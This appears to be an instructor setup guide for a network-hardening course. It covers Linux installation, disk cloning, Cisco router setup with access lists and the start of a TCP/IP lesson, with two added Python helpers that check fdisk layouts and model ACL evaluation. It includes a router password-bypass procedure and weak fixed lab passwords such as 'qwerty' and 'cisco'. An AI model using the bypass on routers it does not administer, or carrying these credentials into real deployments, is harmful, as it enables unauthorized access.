38. For the very first time you do this install, create a boot disk, as you have no way of knowing at this point whether you can successfully boot from the hard drive or not. After you are done creating the boot disk, you will be prompted for the X configuration.

39. For the video card selection, browse the choices and select the option that matches the video card installed in the computer. Sometimes there are problems here, even if the exact model is found. The way to get around this is to choose Generic SVGA, but only as a last resort. Click Next.

40. When the monitor is probed, you may or may not see the right one. Accept the defaults here.

41. Specify a resolution of 800x600x16-bit color. Most mid-range projectors do not handle higher resolutions. Do not click the Test button, as it might cause the installation to go into a loop, forcing you to have to abort the install.

42. Select the login type to be Text, and click Next. This will at least help you to get started if you have any problems with the GUI.

43. Click Exit.


44. As the machine reboots, remove the floppy disk. The CD-ROM will be ejected automatically; remove it and close the CD drawer.

45. When the GRUB loader is displayed, choose Red Hat Linux to test the installation.

46. At the login prompt, enter the username root and password qwerty to verify that you can log in.

47. Enter startx to test the GUI.

48. After you have verified the Linux installation, change the default login type to be GUI. To do this, you will need to edit the file /etc/inittab to change the line id:3:initdefault: to read id:5:initdefault:, and reboot the computer.

49. At the welcome screen, click Forward.

50. If necessary, verify the date and time, and click Forward.

51. If any hardware, such as the sound card, is detected, either test it or ignore it for now. Click Forward.

52. If you are prompted to register, click No, I Do Not Want To Register and click Forward.

53. If additional software options are presented, ignore them. Click Forward twice.

54. Log in as root again to test the GUI login.

55. If you are not supplying the Linux tools on a CD-ROM or shared folder, copy the Linux tools to the hard drive.

56. Shut down the system.
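A check for the partition table built with fdisk in steps 13 through 21, as an added example that is not part of the course materials: it parses the table fdisk prints for p and reports any logical drive whose type id differs from the expected 83/82 layout, so a mistake is caught before w writes the table to disk. The listings inside it are constructed to match the sizes given in these steps; they are not captured from a real installation.

```python
"""Check an fdisk partition listing against the layout this course builds.

Added example, not part of the course materials. It parses the
'Device Boot Start End Blocks Id System' table that fdisk prints for p
(or for fdisk -l) and reports every way it differs from the layout built
in steps 13 through 21: hda5 and hda7 of type 83 (Linux), hda6 of type
82 (Linux swap), all inside one extended primary partition.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Partition type ids used on this page (hex, as fdisk prints them).
LINUX = 0x83
LINUX_SWAP = 0x82
EXTENDED = 0x05

# The layout steps 15 through 19 produce: device name -> expected type id.
EXPECTED_LAYOUT = {"/dev/hda5": LINUX, "/dev/hda6": LINUX_SWAP, "/dev/hda7": LINUX}

# One table row: device, optional boot flag, start/end cylinder, block count
# (fdisk appends '+' when it rounded), hex id and system name.
ROW = re.compile(
    r"^(?P<dev>/dev/\S+)\s+(?P<boot>\*)?\s*(?P<start>\d+)\s+(?P<end>\d+)\s+"
    r"(?P<blocks>\d+)\+?\s+(?P<id>[0-9a-fA-F]+)\s+(?P<system>.+?)\s*$"
)


@dataclass(frozen=True)
class Partition:
    device: str
    number: int       # 1-4 primary or extended, 5 and up logical
    bootable: bool
    start: int        # first cylinder
    end: int          # last cylinder
    type_id: int


def parse_partition_table(listing: str) -> List[Partition]:
    """Extract the partition rows from an fdisk listing; other lines are ignored."""
    parts = []
    for line in listing.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        device = m.group("dev")
        number = int(re.search(r"(\d+)$", device).group(1))
        parts.append(Partition(device, number, m.group("boot") is not None,
                               int(m.group("start")), int(m.group("end")),
                               int(m.group("id"), 16)))
    return parts


def check_layout(parts: List[Partition], expected: Dict[str, int]) -> List[str]:
    """Return a list of problems; an empty list means the table matches."""
    problems = []
    by_device = {p.device: p for p in parts}
    extended = [p for p in parts if p.number <= 4 and p.type_id == EXTENDED]
    if len(extended) != 1:
        problems.append("expected exactly one extended primary partition")
    for device, want in expected.items():
        part = by_device.get(device)
        if part is None:
            problems.append(f"{device} is missing")
            continue
        if part.type_id != want:
            problems.append(f"{device} has type {part.type_id:02x}, expected {want:02x}")
        # A logical drive must lie within the extended partition's cylinders.
        if part.number >= 5 and len(extended) == 1:
            ext = extended[0]
            if part.start < ext.start or part.end > ext.end:
                problems.append(f"{device} lies outside the extended partition")
    return problems


def review(listing: str) -> List[str]:
    """Parse a listing and check it against the course layout."""
    return check_layout(parse_partition_table(listing), EXPECTED_LAYOUT)


# Constructed listing in fdisk's format, sized like this page's layout
# (2600 MB Windows primary, 100 MB /boot, 256 MB swap, the rest for /).
# This is what p shows after step 18, before hda6 is changed to swap.
BEFORE_TYPE_CHANGE = """\
Disk /dev/hda: 255 heads, 63 sectors, 1044 cylinders
Units = cylinders of 16065 * 512 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/hda1   *         1       331   2658726    7  HPFS/NTFS
/dev/hda2           332      1023   5558490    5  Extended
/dev/hda5           332       344    104391   83  Linux
/dev/hda6           345       377    265041   83  Linux
/dev/hda7           378      1023   5188963+  83  Linux
"""
# The same table after step 19 (t, 6, 82) marks hda6 as Linux swap.
AFTER_TYPE_CHANGE = BEFORE_TYPE_CHANGE.replace("265041   83  Linux",
                                               "265041   82  Linux swap")
```

Run review() on the text of a p listing: an empty result means the three logical drives carry the types step 20 asks you to verify.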

Cloning the Hard Drives

Now that the installation of the operating systems is completed on one computer, the hard drive is ready to be cloned for use with all of the student computers, as well as the instructor computer. Please look after this disk well (we’ll refer to it as the source hard drive), as it will serve you for many class preparations. The only thing to watch out for, if you have used evaluation versions, is the 120-day time limit on the Windows 2000 operating system.

Norton’s Ghost is a good product for cloning. If you opt not to use Sysprep, you will also need to use a SID-changer to change the SIDs for the Windows 2000 Server install. Norton’s Ghostwalk is a good product for changing SIDs. You can also download a free SID changer from www.sysinternals.com/ntw2k/source/newsid.shtml. As for Linux—sometimes Linux will not boot off a cloned hard drive. If you come across such problems, perform an install and choose the upgrade option. This takes about 10 minutes (as opposed to a 45-minute full install).

Every computer with the cloned hard drive must be manually reconfigured. You will have to keep track of variables such as computer names, host names, and TCP/IP configuration parameters. Cloning and configuration takes approximately 30 minutes per computer.


1. Insert the master (source) hard drive into the Primary Master removable bay in your cloning machine.

2. Insert the blank (destination) hard drive into the Secondary Master removable bay in your cloning machine.

3. Boot using a bootable floppy disk, and run the cloning program. We recommend Norton’s Ghost utility.

4. Specify the source and destination drives.

5. IMPORTANT: Do not accept the partition sizes on the destination drive—you must match the source drive’s partition sizes; that is, 2600 MB Primary, 100 MB (Linux /boot logical drive), 256 MB (Linux Swap logical drive), and 5+ GB (Linux / logical drive).

6. When done selecting, click Continue and wait for the cloning process to complete.

After Cloning the Hard Drives

Perform the following steps for each cloned hard drive.

1. Insert the cloned hard drive into one of the student machines or the instructor machine.

2. Boot to Windows 2000 Server. Because you ran the Sysprep utility before cloning the hard drive, it should now run a short setup routine.

a. When you are prompted for a new computer name, enter a name as described in Figure 0-2. This will also create a new SID for each machine.

b. Change the IP addresses and default gateway as described in Figure 0-2.

c. Open the Network And Dial-up Connections Control Panel, right-click Local Area Connection 1, and display its properties. Check Show Icon In Taskbar When Connected, and click OK. Determine what this interface is connected to, and then rename the connection Classroom Hub or Partner, accordingly.

d. In the Network And Dial-up Connections Control Panel, right-click Local Area Connection 2, and display its properties. Check Show Icon In Taskbar When Connected, and click OK. Determine what this interface is connected to, and then rename the connection Classroom Hub or Partner, accordingly.

3. Boot to Linux. Change the host name and IP addresses as described in Figure 0-2.

a. If the machine hangs on GRUB, insert the Linux boot CD-ROM, reboot the machine, and upgrade your install. This should take only a few minutes.

b. If you need to change the monitor resolution in Linux, run the Xconfigurator. You can access Xconf by running setup from a terminal.

Estimated minimum time for cloning: 10 minutes per hard drive. If you can image the source hard drive to a file server and multicast this image over the network to all the student machines, estimated minimum time: 5 minutes per hard drive.

Estimated minimum time for manual reconfiguration of cloned hard drives: 10 minutes per workstation, but if you can work in parallel (such as downloading the OS images over a network), you should be able to set up 12 computers with the appropriate configuration in under 4 hours.


4. Shut down the computer.

Configuring Cisco Routers

Three Cisco routers are used in the class. The 2501 series is preferred, with a minimum IOS version of 12.2 (with IPSec/SSH support).

The decision whether to allow or not allow the classroom machines to use the Internet is up to the Internet access policies of your location. You can configure NAT on the Instructor Machine to allow the class members to use the Internet. The default route configuration provided here assumes that you will have the Instructor Machine perform NAT. Alternatively, the CENTER router, the Instructor Machine and another device with NAT capabilities can all be connected to a hub. Whichever method you choose, just enter the appropriate configuration statement on the CENTER router.

The following shows an overview of the configuration requirements of each router. They are to run IP with access lists configured and RIP as the routing protocol. Configuration beyond what is shown here is not required. Students will be asked to connect to the routers, so it is advised that the CENTER router the instructor uses have a different and more complex Enable Password. Students should be allowed to Telnet to all three routers.

• The LEFT router is for one half of the class to connect through. It should have the following configuration:

— Hostname and Routername: LEFT

— Access List Configuration:

Access-list 123 deny tcp any any eq 25

Access-list 123 permit ip any any

INT S0: ip access-group 123 in

• The CENTER router is for the Instructor to connect to the class. It should have the following configuration:

— Hostname and Routername: CENTER

— Access List Configuration:

Access-list 155 deny tcp any any eq 20

Access-list 155 deny tcp any any eq 21

Access-list 155 permit ip any any

INT S0: ip access-group 155 in

INT S1: ip access-group 155 in

• The RIGHT router is for the other half of the class to connect through. It should have the following configuration:

— Hostname and Routername: RIGHT

— Access List Configuration:

Access-list 145 deny tcp any any eq 25

Access-list 145 permit ip any any

INT S1: ip access-group 145 in

Estimated minimum time for router setup: 1 hour.


The detailed configuration procedures are listed here in three main categories:

• Physical configuration

• Router setup

• Access list configuration

Physical Router Configuration

The LEFT router is to be connected to the CENTER router via a Cisco serial cable. The RIGHT router is also to be connected to the CENTER router via a Cisco serial cable. All Ethernet connections are to be made through standard 10/100 BaseT cables.

1. Study the class setup diagram provided in Figure 0-1.

2. Physically connect the three routers to each other, using serial crossover cables, so that the router designated as CENTER controls the clock rate. To do this, connect the DCE end of the serial cable to the serial interfaces on the CENTER router and the DTE ends to the LEFT and RIGHT’s appropriate serial interfaces.

3. Connect the Ethernet interface on the CENTER router to the instructor machine via a crossover Ethernet cable.

4. Connect the Ethernet interfaces on the LEFT and RIGHT routers to their respective hubs serving their side of the classroom.

Before You Start the Router Setup

All routers should be cleared of any configs before setting up the class. If you have a configured router but you don’t know the password, perform the following steps:

1. Console into the router.

2. Enter the sh ver command, and record the configuration register setting (usually 0x2102).

3. Power down the router, and then power it back up.

4. After the amount of main memory is displayed, press the Break key (or Ctrl+Break). You should see the > prompt with no router name.

5. Enter o/r 0x42 to boot from flash or o/r 0x41 to boot from ROM. Typically, you would boot from flash if it were intact.

6. Enter i to force the router to reboot and ignore its saved config.

6. Enter i to force the router to reboot and ignore its saved config.


7. Answer no to all setup questions.

8. When the Router> prompt is displayed, enter enable to switch to enable mode. The Router# prompt should now be displayed. Once you are in enable mode, you can view and change the password, and you can erase the config.

9. To view the password, enter show config at the Router# prompt.

10. To change the password, from the Router# prompt:

a. Enter config mem to copy NVRAM to mem.

b. Enter wr term.

c. Enter config term to enter config mode. The Router(config)# prompt is now displayed.

d. If an enable secret password is set, enter enable secret newpassword, or if there is no enable secret password, enter enable password newpassword, where newpassword is the new password you want to use.

e. Press Ctrl+Z to exit config mode. The Router# prompt is now displayed.

f. Enter write mem to commit the changes to mem. You should now be able to console in and configure the router.

11. To erase the config, from the Router# prompt:

a. Enter write erase.

b. Enter config term to enter config mode. The Router(config)# prompt is now displayed.

c. Enter config-register 0x2102 or whatever the configuration register setting was when you began.

d. Press Ctrl+Z to exit config mode. The Router# prompt is now displayed.

e. Enter reload.

f. When you are prompted to save the modified system configuration, enter y.

g. When you are prompted to proceed with the reload, enter y.

Setup for CENTER Router

The CENTER router is used by the instructor to connect to the rest of the class. To set up the CENTER router:

1. Boot up the router and console into it. You should be prompted to enter the initial configuration dialog. (If you are not, follow the procedures listed previously in the “Before You Start the Router Setup” section.)

2. When you are prompted:

a. To enter the initial configuration dialog, enter y.

b. To enter basic management setup, enter n.

c. As to whether you want to see the current interface summary, press Enter.


d. To enter the host name for [Router], enter CENTER.

e. To enter the enable secret password, enter instructor.

f. To enter the enable password, enter cisco1.

g. To enter the virtual terminal password, enter 2501.

h. To configure SNMP network management, enter n.

i. To configure LAT, enter n.

j. To configure bridging, press Enter to accept the default of No.

k. To configure AppleTalk, press Enter to accept the default of No.

l. To configure DECnet, press Enter to accept the default of No.

m. To configure IP, press Enter to accept the default of Yes.

n. To configure IGRP routing, enter n.

o. To configure RIP routing, enter y.

p. To configure CLNS, press Enter to accept the default of No.

q. To configure IPX, press Enter to accept the default of No.

r. To configure Vines, press Enter to accept the default of No.

s. To configure XNS, press Enter to accept the default of No.

t. To configure Apollo, press Enter to accept the default of No.

u. If you are prompted to configure BRI, select switch type 0.

v. To configure the Ethernet0 interface, press Enter to accept the default of Yes.

w. To configure IP on this interface, press Enter to accept the default of Yes.

x. For the IP address for this interface, enter 172.17.0.1.

y. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.

z. To configure the Serial0 interface, press Enter to accept the default of Yes.

aa. To configure IP on this interface, press Enter to accept the default of Yes.

ab. To configure IP unnumbered on this interface, press Enter to accept the default of No.

ac. For the IP address for this interface, enter 192.168.20.2.

ad. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.

ae. To configure the Serial1 interface, press Enter to accept the default of Yes.

af. To configure IP on this interface, press Enter to accept the default of Yes.

ag. To configure IP unnumbered on this interface, press Enter to accept the default of No.

ah. For the IP address for this interface, enter 192.168.10.2.

ai. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.


aj. If you are prompted to configure any other serial interfaces, enter n until a configuration command script is generated, and you are prompted to make a selection regarding the next action.

ak. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the configuration. When the configuration build is complete, an OK message is displayed.

al. To press RETURN to get started, press Enter. The CENTER> prompt should now be displayed.

3. At the CENTER> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter instructor. The CENTER# prompt should now be displayed.

5. At the CENTER# prompt, enter conf t to enter config mode. The CENTER(config)# prompt should now be displayed.

6. At the CENTER(config)# prompt:

a. Enter no ip domain lookup.

b. Enter int s0 and the CENTER(config-if)# prompt should now be displayed.

7. At the CENTER(config-if)# prompt:

a. Enter no shut.

b. Enter clo ra 4000000.

c. Enter ban 10000000.

d. Enter int s1.

e. Enter no shut.

f. Enter clo ra 4000000.

g. Enter ban 10000000.

h. Enter exit and the CENTER(config)# prompt is now displayed.

8. At the CENTER(config)# prompt:

a. Enter ip route 0.0.0.0 0.0.0.0 172.17.10.1.

b. Enter exit and the CENTER# prompt is now displayed.

9. At the CENTER# prompt:

a. Enter sh run and you should see a message indicating that the router is building the configuration.

b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to accept the default of startup-config. You should again see a message indicating that the router is building the configuration.


Setup for LEFT Router

The LEFT router is used by half of the students to connect to the rest of the class. To set up the LEFT router:

1. Boot up the router and console into it. You should be prompted to enter the initial configuration dialog. (If you are not, follow the procedures listed previously in the “Before You Start the Router Setup” section.)

2. When you are prompted:

a. To enter the initial configuration dialog, enter y.

b. To enter basic management setup, enter n.

c. As to whether you want to see the current interface summary, press Enter.

d. To enter the host name for [Router], enter LEFT.

e. To enter the enable secret password, enter cisco.

f. To enter the enable password, enter cisco1.

g. To enter the virtual terminal password, enter 2501.

h. To configure SNMP network management, enter n.

i. To configure LAT, enter n.

j. To configure bridging, press Enter to accept the default of No.

k. To configure AppleTalk, press Enter to accept the default of No.

l. To configure DECnet, press Enter to accept the default of No.

m. To configure IP, press Enter to accept the default of Yes.

n. To configure IGRP routing, enter n.

o. To configure RIP routing, enter y.

p. To configure CLNS, press Enter to accept the default of No.

q. To configure IPX, press Enter to accept the default of No.

r. To configure Vines, press Enter to accept the default of No.

s. To configure XNS, press Enter to accept the default of No.

t. To configure Apollo, press Enter to accept the default of No.

u. If you are prompted to configure BRI, select switch type 0.

v. To configure the Ethernet0 interface, press Enter to accept the default of Yes.

w. To configure IP on this interface, press Enter to accept the default of Yes.

x. For the IP address for this interface, enter 172.16.0.1.

y. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.

z. To configure the Serial0 interface, press Enter to accept the default of Yes.

aa. To configure IP on this interface, press Enter to accept the default of Yes.

ab. To configure IP unnumbered on this interface, press Enter to accept the default of No.


ac. For the IP address for this interface, enter 192.168.10.1.

ad. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.

ae. To configure the Serial1 interface, enter n.

af. If you are prompted to configure any other serial interfaces, enter n until a configuration command script is generated, and you are prompted to make a selection regarding the next action.

ag. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the configuration. When the configuration build is complete, an OK message is displayed.

ah. To press RETURN to get started, press Enter. The LEFT> prompt should now be displayed.

3. At the LEFT> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter cisco. The LEFT# prompt should now be displayed.

5. At the LEFT# prompt, enter conf t to enter config mode. The LEFT(config)# prompt should now be displayed.

6. At the LEFT(config)# prompt:

a. Enter no ip domain lookup.

b. Enter int s0 and the LEFT(config-if)# prompt should now be displayed.

7. At the LEFT(config-if)# prompt:

a. Enter no shut.

b. Enter ban 10000000.

c. Enter exit and the LEFT(config)# prompt is now displayed.

8. At the LEFT(config)# prompt:

a. Enter ip route 0.0.0.0 0.0.0.0 192.168.10.2.

b. Enter exit and the LEFT# prompt is now displayed.

9. At the LEFT# prompt:

a. Enter sh run and you should see a message indicating that the router is building the configuration.

b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to accept the default of startup-config. You should again see a message indicating that the router is building the configuration.

Setup for RIGHT Router

The RIGHT router is used by half of the students to connect to the rest of the class. To set up the RIGHT router:


1. Boot up the router and console into it. You should be prompted to enter the initial configuration dialog. (If you are not, follow the procedures listed previously in the “Before You Start the Router Setup” section.)

2. When you are prompted:

a. To enter the initial configuration dialog, enter y.

b. To enter basic management setup, enter n.

c. As to whether you want to see the current interface summary, press Enter.

d. To enter the host name for [Router], enter RIGHT.

e. To enter the enable secret password, enter cisco.

f. To enter the enable password, enter cisco1.

g. To enter the virtual terminal password, enter 2501.

h. To configure SNMP network management, enter n.

i. To configure LAT, enter n.

j. To configure bridging, press Enter to accept the default of No.

k. To configure AppleTalk, press Enter to accept the default of No.

l. To configure DECnet, press Enter to accept the default of No.

m. To configure IP, press Enter to accept the default of Yes.

n. To configure IGRP routing, enter n.

o. To configure RIP routing, enter y.

p. To configure CLNS, press Enter to accept the default of No.

q. To configure IPX, press Enter to accept the default of No.

r. To configure Vines, press Enter to accept the default of No.

s. To configure XNS, press Enter to accept the default of No.

t. To configure Apollo, press Enter to accept the default of No.

u. If you are prompted to configure BRI, select switch type 0.

v. To configure the Ethernet0 interface, press Enter to accept the default of Yes.

w. To configure IP on this interface, press Enter to accept the default of Yes.

x. For the IP address for this interface, enter 172.18.0.1.

y. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.

z. To configure the Serial0 interface, enter n.

aa. To configure the Serial1 interface, press Enter to accept the default of Yes.

ab. To configure IP on this interface, press Enter to accept the default of Yes.

ac. To configure IP unnumbered on this interface, press Enter to accept the default of No.

ad. For the IP address for this interface, enter 192.168.20.1.

ae. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.


af. If you are prompted to configure any other serial interfaces, enter n until a configuration command script is generated, and you are prompted to make a selection regarding the next action.

ag. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the configuration. When the configuration build is complete, an OK message is displayed.

ah. To press RETURN to get started, press Enter. The RIGHT> prompt should now be displayed.

3. At the RIGHT> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter cisco. The RIGHT# prompt should now be displayed.

5. At the RIGHT# prompt, enter conf t to enter config mode. The RIGHT(config)# prompt should now be displayed.

6. At the RIGHT(config)# prompt:

a. Enter no ip domain lookup.

b. Enter int s1 and the RIGHT(config-if)# prompt should now be displayed.

7. At the RIGHT(config-if)# prompt:

a. Enter no shut.

b. Enter ban 10000000.

c. Enter exit and the RIGHT(config)# prompt is now displayed.

8. At the RIGHT(config)# prompt:

a. Enter ip route 0.0.0.0 0.0.0.0 192.168.20.2.

b. Enter exit and the RIGHT# prompt is now displayed.

9. At the RIGHT# prompt:

a. Enter sh run and you should see a message indicating that the router is building the configuration.

b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to accept the default of startup-config. You should again see a message indicating that the router is building the configuration.

Configuring the Access Lists

After the initial router setup and the basic configuration have been completed on all three routers, you need to enter the access lists for each of the routers. To do so:

1. To complete the LEFT Router Access Lists:


a. At the LEFT# prompt, enter conf t to switch to config mode. The LEFT(config)# prompt is now displayed.

b. At the LEFT(config)# prompt, enter access-list 123 deny tcp any any eq 25.

c. At the LEFT(config)# prompt, enter access-list 123 permit ip any any.

d. At the LEFT(config)# prompt, enter int S0 to configure the interface. The LEFT(config-if)# prompt is now displayed.

e. At the LEFT(config-if)# prompt, enter ip access-group 123 in.

f. At the LEFT(config-if)# prompt, press Ctrl+Z to leave config mode. The LEFT# prompt is now displayed.

g. At the LEFT# prompt, enter copy ru st and save the configuration changes to startup-config.

2. To complete the RIGHT Router Access Lists:

a. At the RIGHT# prompt, enter conf t to switch to config mode. The RIGHT(config)# prompt is now displayed.

b. At the RIGHT(config)# prompt, enter access-list 145 deny tcp any any eq 25.

c. At the RIGHT(config)# prompt, enter access-list 145 permit ip any any.

d. At the RIGHT(config)# prompt, enter int S1 to configure the interface. The RIGHT(config-if)# prompt is now displayed.

e. At the RIGHT(config-if)# prompt, enter ip access-group 145 in.

f. At the RIGHT(config-if)# prompt, press Ctrl+Z to leave config mode. The RIGHT# prompt is now displayed.

g. At the RIGHT# prompt, enter copy ru st and save the configuration changes to startup-config.

3. To complete the CENTER Router Access Lists:

a. At the CENTER# prompt, enter conf t to switch to config mode. The CENTER(config)# prompt is now displayed.

b. At the CENTER(config)# prompt, enter access-list 155 deny tcp any any eq 20.

c. At the CENTER(config)# prompt, enter access-list 155 deny tcp any any eq 21.

d. At the CENTER(config)# prompt, enter access-list 155 permit ip any any.

e. At the CENTER(config)# prompt, enter int S1 to configure the S1 interface. The CENTER(config-if)# prompt is now displayed.

f. At the CENTER(config-if)# prompt, enter ip access-group 155 in.

g. At the CENTER(config-if)# prompt, enter int S0 to configure the S0 interface.

h. At the CENTER(config-if)# prompt, enter ip access-group 155 in.

i. At the CENTER(config-if)# prompt, press Ctrl+Z to leave config mode. The CENTER# prompt is now displayed.


j. At the CENTER# prompt, enter copy ru st and save the configuration changes to startup-config.

4. Test the classroom setup, and troubleshoot as necessary. Once physical connectivity issues have been sorted out, you should be able to ping from one side of the classroom to the other. Specifically, the instructor machine should be able to ping every student machine and vice versa. Student machines from the left side of the classroom should be able to ping student machines on the right side of the classroom and vice versa.
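How the access lists typed in steps 1 to 3 decide each packet, as an added Python model that is not part of the course text: entries are tested top down, the first match wins, and the implicit deny at the end of every IOS list drops anything unmatched. The sample packets are constructed; the model supports only the "any any" and "eq port" forms used in the setup.

```python
"""First-match model of the classroom access lists, with IOS's implicit deny.
Added example for the router setup above; not part of the course text, and the
traffic samples are constructed."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Ace:
    """One access control entry of the 'any any' form used in the setup."""
    action: str             # "permit" or "deny"
    proto: str              # "tcp", "udp", "icmp", or "ip" meaning any protocol
    dport: Optional[int]    # destination port for 'eq N', None for any port


@dataclass(frozen=True)
class Packet:
    proto: str
    dport: Optional[int] = None   # ICMP carries no port


def parse_ace(line: str) -> Ace:
    """Parse lines such as 'access-list 155 deny tcp any any eq 21' or
    'access-list 123 permit ip any any'.  Named lists, sequence numbers and
    sources/destinations other than 'any' are rejected rather than guessed."""
    t = line.split()
    if len(t) < 6 or t[0] != "access-list" or t[2] not in ("permit", "deny") \
            or t[4:6] != ["any", "any"]:
        raise ValueError(f"unsupported access-list entry: {line!r}")
    dport = None
    if len(t) > 6:
        if len(t) != 8 or t[6] != "eq":
            raise ValueError(f"unsupported port qualifier: {line!r}")
        dport = int(t[7])
    return Ace(action=t[2], proto=t[3], dport=dport)


def matches(ace: Ace, pkt: Packet) -> bool:
    """'ip' matches every protocol; a port qualifier must match exactly."""
    if ace.proto != "ip" and ace.proto != pkt.proto:
        return False
    return ace.dport is None or ace.dport == pkt.dport


def evaluate(acl: List[Ace], pkt: Packet) -> str:
    """Entries are tested top down and the first match decides; a packet that
    matches nothing hits the implicit 'deny any' that ends every IOS ACL."""
    for ace in acl:
        if matches(ace, pkt):
            return ace.action
    return "deny"


def load_acl(lines) -> List[Ace]:
    return [parse_ace(line) for line in lines]


# The lists typed in steps 1 and 3 above.
LEFT_123 = load_acl([
    "access-list 123 deny tcp any any eq 25",
    "access-list 123 permit ip any any",
])
CENTER_155 = load_acl([
    "access-list 155 deny tcp any any eq 20",
    "access-list 155 deny tcp any any eq 21",
    "access-list 155 permit ip any any",
])
# The same list with the final permit forgotten: after the two explicit denies
# only the implicit deny remains, so even the step-4 pings are dropped.
CENTER_155_NO_PERMIT = CENTER_155[:-1]

# Constructed sample traffic, as seen inbound on the serial interfaces.
SAMPLES = {
    "smtp": Packet("tcp", 25),
    "http": Packet("tcp", 80),
    "ftp-control": Packet("tcp", 21),
    "ftp-data": Packet("tcp", 20),
    "udp-21": Packet("udp", 21),
    "ping": Packet("icmp"),
}


def decisions(acl: List[Ace]) -> dict:
    """Verdict for every sample packet under one access list."""
    return {name: evaluate(acl, pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for label, acl in (("LEFT 123", LEFT_123), ("CENTER 155", CENTER_155),
                       ("CENTER 155 without permit", CENTER_155_NO_PERMIT)):
        print(label, decisions(acl))
```

The third list shows why step 4's ping test matters: leave out the trailing permit ip any any and the list blocks all traffic, not just the intended ports.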

List of Additional Files

Printed with each lesson is a list of files students open to complete the tasks in that lesson. Many tasks also require additional files that students do not open, but are needed to support the file(s) students are working with. These supporting files are included with the student data files on the course CD-ROM or data disk. Do not delete these files.

HOW TO USE THIS BOOK

You can use this book as a learning guide, a review tool, and a reference.

As a Learning Guide

Each lesson covers one broad topic or set of related topics. Lessons are arranged in order of increasing proficiency with Hardening the Infrastructure; skills you acquire in one lesson are used and developed in subsequent lessons. For this reason, you should work through the lessons in sequence.

We organized each lesson into explanatory topics and step-by-step activities. Topics provide the theory you need to master Hardening the Infrastructure; activities allow you to apply this theory to practical hands-on examples.

Through the use of sample files, hands-on activities, illustrations that give you feedback at crucial steps, and supporting background information, this book provides you with the foundation and structure to learn about Hardening the Infrastructure quickly and easily.

As a Review Tool

Any method of instruction is only as effective as the time and effort you are willing to invest in it. For this reason, we encourage you to spend some time reviewing the book’s more challenging topics and activities.

As a Reference

You can use the Concepts sections in this book as a first source for definitions of terms, background information on given topics, and summaries of procedures.


Lesson 1: Advanced TCP/IP

Overview

There is one primary set of protocols that runs networks and the Internet today. In this lesson, you will work with those protocols: the Transmission Control Protocol (TCP) and the Internet Protocol (IP). In order to manage the security of a network, you must become familiar with the details of how TCP/IP functions, including core concepts, such as addressing and subnetting, and advanced concepts, such as session establishment and packet analysis.

Objectives

To better understand advanced TCP/IP concepts, you will:

1A Define the core concepts of TCP/IP.

Given a machine running TCP/IP, you will define the core concepts of TCP/IP, including the layering models, RFCs, addressing and subnetting, VLSM and CIDR, and the TCP/IP suite.

1B Analyze sessions of TCP.

Given a Windows 2000 computer, you will examine control flags, sequence numbers, and acknowledgement numbers, and you will use Network Monitor to view and analyze all of the fields of the three-way handshake and session teardowns.

1C Analyze IP.

Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of IP.

1D Analyze ICMP.

Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of ICMP.

1E Analyze TCP.

Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of TCP.

1F Analyze UDP.

Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of UDP.

Data Files: tftp.cap, fragment.cap, ping.txt, ping.cap, ftp.txt, ftp.cap

Lesson Time: 6 hours


1G Analyze fragmentation.

Given a Windows 2000 computer, you will use Network Monitor to view and analyze network traffic fragmentation.

1H Complete a full session analysis.

Given a Windows 2000 computer, you will use Network Monitor to view and analyze a complete FTP session, frame by frame.

1I Examine the concepts of Internet Protocol version 6.

In this topic, you will be introduced to the fundamental concepts surrounding Internet Protocol version 6, and its implementation in networking.


Topic 1A: TCP/IP Concepts

In order for two hosts to communicate, there must first be an agreed-upon method of communication for both hosts to use. The protocol that the Internet was built on, and the protocol that all hosts on the Internet use, is TCP/IP, or Transmission Control Protocol/Internet Protocol. Because the two hosts agree on the protocol they will use, we can go right into the details of the protocol itself.

The TCP/IP Model

In order for data to move from one host to another, it must be transmitted and received. There are several ways that this could happen, in theory.

• The data file could be sent as a whole file, intact, from one host to another.

• The data file could be split in half and sent, sending and receiving two equal-sized pieces.

• The data file could be split into many smaller pieces, all sent and received in a specific sequence.

It is this last method that is actually used. For example, if a user is at a host and wants to view a Web page on a different host, the request and subsequent response will take many small steps to complete. In Figure 1-1, you can see the four layers of the TCP/IP Model, along with the Web browser’s request for a Web page going to the Web server.

Figure 1-1: A Web request moving along the TCP/IP Model.

The four layers of the TCP/IP Model are:

• The Application Layer

• The Transport Layer

• The Internet Layer (also called the Network Layer)

• The Network Access Layer (also called the Link Layer)

Many of the concepts in this topic were covered in the prerequisite courses, but are provided here for review.

host: A single computer or workstation; it can be connected to a network.

server: A system that provides network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.


The reason that there are alternate names for these layers is that the industry has never agreed on a single standard for the names. Each of these layers is detailed as follows:

• The Application Layer is the highest layer in the model, and communicates with the software that requires the network. In our example, the software is the Web page request from a browser.

• The Transport Layer is where the reliability of the communication is dealt with. There are two protocols that work at this layer, TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). An immediate difference between the two is that TCP does provide for reliable delivery of data, whereas UDP provides no such guarantee.

